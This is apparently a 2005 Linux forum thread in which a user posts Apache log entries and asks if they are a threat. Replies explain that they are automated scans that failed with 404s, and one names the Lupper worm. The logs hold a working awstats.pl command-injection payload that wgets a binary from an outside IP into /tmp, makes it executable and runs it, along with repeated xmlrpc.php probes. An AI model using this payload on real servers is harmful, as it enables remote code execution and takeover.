I've noticed some very strange logs in my apache_log file. When it says chmod I feel a bit worried. This is a sample.

220.194.61.230 - - [17/Nov/2005:10:53:33 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
220.194.61.230 - - [17/Nov/2005:10:53:35 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
220.194.61.230 - - [17/Nov/2005:10:53:36 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310
220.194.61.230 - - [17/Nov/2005:10:53:38 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
220.194.61.230 - - [17/Nov/2005:10:53:40 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 299
220.194.61.230 - - [17/Nov/2005:10:53:41 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
220.194.61.230 - - [17/Nov/2005:10:53:43 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
220.194.61.230 - - [17/Nov/2005:10:53:44 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301
220.194.61.230 - - [17/Nov/2005:10:53:45 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307
220.194.61.230 - - [17/Nov/2005:10:53:47 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304
220.194.61.230 - - [17/Nov/2005:10:53:48 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
220.194.61.230 - - [17/Nov/2005:10:53:50 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301
220.194.61.230 - - [17/Nov/2005:10:53:51 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301
client-82-2-80-26.manc.adsl.virgin.net - - [17/Nov/2005:13:31:28 +0000] "GET / HTTP/1.0" 200 1683
www.nomura-system.co.jp - - [17/Nov/2005:15:15:37 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
www.nomura-system.co.jp - - [17/Nov/2005:15:15:38 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
www.nomura-system.co.jp - - [17/Nov/2005:15:15:40 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310
www.nomura-system.co.jp - - [17/Nov/2005:15:15:44 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
www.nomura-system.co.jp - - [17/Nov/2005:15:15:45 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 299
www.nomura-system.co.jp - - [17/Nov/2005:15:15:47 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
www.nomura-system.co.jp - - [17/Nov/2005:15:15:48 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
www.nomura-system.co.jp - - [17/Nov/2005:15:15:49 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301
www.nomura-system.co.jp - - [17/Nov/2005:15:15:53 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307
www.nomura-system.co.jp - - [17/Nov/2005:15:15:55 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304
www.nomura-system.co.jp - - [17/Nov/2005:15:15:56 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
www.nomura-system.co.jp - - [17/Nov/2005:15:15:57 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301
www.nomura-system.co.jp - - [17/Nov/2005:15:15:59 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301
antispam3.test.mail.sc5.yahoo.com - - [17/Nov/2005:17:06:42 +0000] "GET / HTTP/1.0" 200 1683


Is this anything I need to worry about?

These requests are simply trying to find known security holes in web applications.
As long as you don't have these installed, there's no reason to worry.

Such "attacks" are quite common. You might also find lots of login attempts using common usernames (root, bin, webmaster, ...) in your /var/log/secure (or /var/log/auth.log, depending on distro).

The 404 codes (meaning "not found") show that you don't have any of these apps running.
The chmod has been given as a parameter to the (probably vulnerable) awstats.pl script, which you don't seem to have.

If you ever get a non 4xx code, you may start worrying.

Regards
ric.

as long as your webserver is running as nobody/nobody
and you don't have any scripts set to world RWX then you are fine, even if you happen to have awstats installed.

Yes, I read the security warning at the top of the forum which seemed to relate to awstats and thought it might be that. I did have awstats installed but don't at the moment. I noticed the attempts were failing, but it's being quite persistent. Is it worth trying to block specific domains or ip's? Nothing to worry about at the moment anyway.

you can block domains or subnets if you want, but from experience with my log files, you will be adding 1 or 2 a day forever.

Full ack to Finlay. Blocking domains would be a never ending work. Worst case you might block normal visitors that come from these domains or address ranges.

Just make sure you have enough free space for log files ;-)

Regards
ric.

This is the Linux Lupper worm...